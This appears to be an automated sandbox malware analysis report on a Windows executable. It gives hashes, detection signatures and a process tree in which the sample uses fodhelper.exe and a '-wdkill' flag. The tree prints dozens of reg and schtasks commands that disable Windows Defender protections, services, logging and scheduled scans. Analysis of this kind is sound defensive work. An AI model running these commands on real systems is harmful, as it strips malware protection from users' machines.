Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-07-2021 14:31

General

  • Target

    04436C72506D84210A597C57880DBE3E.exe

  • Size

    1.4MB

  • MD5

    04436c72506d84210a597c57880dbe3e

  • SHA1

    d77bf018b1fa76215f2ca680e4cf25ad034eb271

  • SHA256

    87fbd9577039b209cd0ce825d1c79aad0def611625b737fa3abe70802da4d6f4

  • SHA512

    4dcfcc70d77c0fcf0fc74622f37cd176f0130bf8158330a6588d6c4c5bfcafc082dd003d514a10bbb01b12af575a3558d6255e65fd6ca90204e886d3f6a92064

Score
10/10

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\04436C72506D84210A597C57880DBE3E.exe
    "C:\Users\Admin\AppData\Local\Temp\04436C72506D84210A597C57880DBE3E.exe"
    1⤵
    • Enumerates connected drives
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:652
    • C:\Windows\System32\fodhelper.exe
      "C:\Windows\System32\fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1628
      • C:\Users\Admin\AppData\Local\Temp\04436C72506D84210A597C57880DBE3E.exe
        "C:\Users\Admin\AppData\Local\Temp\04436C72506D84210A597C57880DBE3E.exe" -wdkill
        3⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1504
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
          4⤵
            PID:3568
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            4⤵
              PID:3984
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              4⤵
                PID:1332
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
                4⤵
                  PID:1192
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                  4⤵
                    PID:2132
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:3888
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                      4⤵
                        PID:1692
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                        4⤵
                          PID:2484
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                          4⤵
                            PID:1868
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            4⤵
                              PID:3212
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                              4⤵
                                PID:188
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                4⤵
                                  PID:312
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                  4⤵
                                    PID:3704
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                    4⤵
                                      PID:704
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                      4⤵
                                        PID:1276
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                        4⤵
                                          PID:3164
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                          4⤵
                                            PID:2300
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                            4⤵
                                              PID:2892
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                              4⤵
                                                PID:2360
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                4⤵
                                                  PID:868
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                  4⤵
                                                    PID:2624
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                    4⤵
                                                      PID:3688
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                      4⤵
                                                        PID:2172
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                        4⤵
                                                          PID:2216
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                          4⤵
                                                            PID:2092
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                            4⤵
                                                              PID:596
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                              4⤵
                                                                PID:3380
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                4⤵
                                                                  PID:2200
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                  4⤵
                                                                    PID:1852
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                    4⤵
                                                                      PID:3892
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                      4⤵
                                                                        PID:2456
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
                                                                        4⤵
                                                                          PID:4184
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                          4⤵
                                                                            PID:4216
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                            4⤵
                                                                              PID:4248
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
                                                                              4⤵
                                                                                PID:4280
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                4⤵
                                                                                  PID:4196
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                  4⤵
                                                                                    PID:4316
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                    4⤵
                                                                                      PID:4356
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                      4⤵
                                                                                        PID:4392
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                        4⤵
                                                                                          PID:4444
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                          4⤵
                                                                                            PID:4480
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                            4⤵
                                                                                              PID:4536
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                              4⤵
                                                                                                PID:4584
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                4⤵
                                                                                                  PID:4632
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                  4⤵
                                                                                                    PID:4704
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                    4⤵
                                                                                                      PID:4772
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                      4⤵
                                                                                                        PID:4672
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                        4⤵
                                                                                                          PID:4808
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                          4⤵
                                                                                                            PID:4960
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                            4⤵
                                                                                                              PID:5004
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                              4⤵
                                                                                                                PID:4920
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                4⤵
                                                                                                                  PID:4848
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                  4⤵
                                                                                                                    PID:5108
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                    4⤵
                                                                                                                      PID:928
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                      4⤵
                                                                                                                        PID:1276
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                        4⤵
                                                                                                                          PID:2132
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                          4⤵
                                                                                                                            PID:5072
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                            4⤵
                                                                                                                              PID:2072
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                              4⤵
                                                                                                                                PID:4152
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                4⤵
                                                                                                                                  PID:820
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                  4⤵
                                                                                                                                    PID:1496
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    4⤵
                                                                                                                                      PID:4052
                                                                                                                                • C:\Windows\System32\fodhelper.exe
                                                                                                                                  "C:\Windows\System32\fodhelper.exe"
                                                                                                                                  2⤵
                                                                                                                                    PID:4232
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\04436C72506D84210A597C57880DBE3E.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\04436C72506D84210A597C57880DBE3E.exe" -wdkill
                                                                                                                                      3⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:4252
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
                                                                                                                                        4⤵
                                                                                                                                          PID:4644
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                                          4⤵
                                                                                                                                            PID:4352
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                                            4⤵
                                                                                                                                              PID:4372
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                                              4⤵
                                                                                                                                                PID:4408
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                4⤵
                                                                                                                                                  PID:4788
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4528
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4840
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                                                                      4⤵
                                                                                                                                                        PID:4496
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                                                                        4⤵
                                                                                                                                                          PID:4492
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                                                                          4⤵
                                                                                                                                                            PID:4260
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                                            4⤵
                                                                                                                                                              PID:4300
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4248
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:4296
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4804
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:4380
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:4592
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:4600
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:4712
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:4556
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:4512
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:4572
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:4216
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:4208
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:4340
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:4680
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:4416
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:4268
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:4476
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:4392
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:4656
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:4468
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:3256
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:3696
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:3596
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:3692
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:3452
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:2464
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2468
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:2596
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:68
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:3032
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:1816
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:4120
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:2356
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:3940
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:1340
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:2064
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:4012
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:428
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:3980
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
